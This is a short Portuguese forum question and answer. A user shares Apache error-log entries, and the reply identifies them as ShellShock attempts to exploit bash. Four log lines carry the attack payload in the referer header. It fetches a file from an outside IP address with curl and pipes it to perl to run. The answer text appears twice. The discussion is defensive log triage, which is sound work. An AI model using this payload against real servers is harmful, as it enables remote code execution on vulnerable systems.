Este é o ShellShock, o ataque / exploração de vulnerabilidades do bash. Mais detalhes e como verificar se você está vulnerável são fornecidos, por exemplo, aqui: link .
Eu descobri algumas solicitações HTTP estranhas em meus logs do Apache, mas não tenho certeza se devo estar preocupado com elas ou não?
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bizdb1-search.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bigconf.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/bbs_forum.cgi, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
[Sun Nov 02 19:45:43 2014] [error] [client 80.82.64.122] script not found or unable to stat: /usr/lib/cgi-bin/BBS, referer: () { :; }; curl http://202.28.77.53/~prajaks/310482/index.png | perl
Alguma idéia?
Este é o ShellShock, o ataque / exploração de vulnerabilidades do bash. Mais detalhes e como verificar se você está vulnerável são fornecidos, por exemplo, aqui: link .
Tags logging apache-2.2